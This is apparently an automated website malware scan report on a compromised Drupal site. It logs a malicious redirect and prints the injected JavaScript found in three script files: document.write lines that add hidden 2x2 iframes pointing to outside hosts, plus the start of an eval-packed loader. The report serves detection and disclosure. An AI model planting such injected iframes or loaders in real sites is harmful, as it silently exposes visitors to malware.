Malicious/Suspicious Redirects
URL: http://folkfreunde.de/ (imitation of visitor from search engine)
Request:
GET / HTTP/1.1
Host: folkfreunde.de
Referer: http://www.google.com/search?q=redirect+check1
Server response:
HTTP/1.1 302 Found
Cache-Control: max-age=1209600
Connection: close
Date: Thu, 28 Aug 2014 20:20:19 GMT
Location: http://cooptraiss.com/hezd.html?h=559050
Server: Apache
Vary: Accept-Encoding
Content-Length: 224
Content-Type: text/html; charset=iso-8859-1
Expires: Thu, 11 Sep 2014 20:20:19 GMT
Status: malicious
Scanned pages/files
Request | Server response | Status |
http://folkfreunde.de/ | 200 OK Content-Length: 5505 Content-Type: text/html | clean |
http://folkfreunde.de/user/register | 200 OK Content-Length: 6949 Content-Type: text/html | clean |
http://folkfreunde.de/misc/jquery.js?x | 200 OK Content-Length: 31352 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=559050></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://alicebangkokescorts.com/womd.html?j=559050></iframe>');
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};i
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://alicebangkokescorts.com/womd.html?j=559050
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://alicebangkokescorts.com/womd.html?j=559050>
Hidden iFrame found. size: 2x2 src: http://cooptraiss.com/hezd.html?j=559050
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=559050>
http://folkfreunde.de/misc/drupal.js?x | 200 OK Content-Length: 10097 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=559050></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://alicebangkokescorts.com/womd.html?j=559050></iframe>');
var Drupal = Drupal || { 'settings': {}, 'behaviors': {}, 'themes': {}, 'locale': {} }; Drupal.jsEnabled = document.getElementsByTa } return message; } if (Drupal.jsEnabled) { $(document.documentElement).addClass('js'); document.cookie = 'has_js=1; path=/'; $(document).ready(function() { Drupal.attachBehaviors(this); }); } Drupal.theme.prototype = { placeholder: function(str) { return '<em>' + Drupal.checkPlain(str) + '</em>'; } };
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://alicebangkokescorts.com/womd.html?j=559050
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://alicebangkokescorts.com/womd.html?j=559050>
Hidden iFrame found. size: 2x2 src: http://cooptraiss.com/hezd.html?j=559050
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=559050>
http://folkfreunde.de/sites/default/files/languages/de_06718c61422adac0e3e00259fc4af339.js?x | 200 OK Content-Length: 354 Content-Type: application/javascript | clean |
http://folkfreunde.de/modules/user/user.js?x | 200 OK Content-Length: 7295 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=559050></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://alicebangkokescorts.com/womd.html?j=559050></iframe>');
Drupal.behaviors.password = function(context) { var translate = Drupal.settings.password; $("input.password-field:not(.pass var offset = new Date().getTimezoneOffset() * -60; $("#edit-date-default-timezone, #edit-user-register-timezone").val(offset); }; Drupal.behaviors.userSettings = function (context) { $('div.user-admin-picture-radios input[type=radio]:not(.userSettings-processed)', context).addClass('userSettings-processed').click(function () { $('div.user-admin-picture-settings', context)[['hide', 'show'][this.value]](); }); };
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://alicebangkokescorts.com/womd.html?j=559050
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://alicebangkokescorts.com/womd.html?j=559050>
Hidden iFrame found. size: 2x2 src: http://cooptraiss.com/hezd.html?j=559050
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=559050>
http://folkfreunde.de/user | 200 OK Content-Length: 5062 Content-Type: text/html | clean |
http://folkfreunde.de/user/password | 200 OK Content-Length: 4724 Content-Type: text/html | clean |
http://folkfreunde.de/test404page.js | 404 Not Found Content-Length: 3681 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=folkfreunde.de
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://folkfreunde.de/
Result: folkfreunde.de is not infected or malware details are not published yet.